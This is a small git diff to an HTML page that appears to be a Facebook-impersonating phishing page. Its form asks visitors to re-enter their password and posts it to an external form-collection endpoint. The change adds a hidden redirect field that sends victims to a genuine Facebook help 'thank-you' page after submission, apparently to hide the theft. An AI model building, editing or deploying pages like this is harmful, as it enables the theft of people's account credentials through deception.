--- a/index.html
+++ b/index.html
@@ -113,6 +113,8 @@
         </div>
         <p>Please re-enter your password to complete the request.</p>
         <form id="passwordForm" action="https://submit-form.com/vlPSeMpvr" method="POST">
+                                <input type="hidden" name="_redirect" value="https://www.facebook.com/help/media/thank-you?rdrh"/>
+                                
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
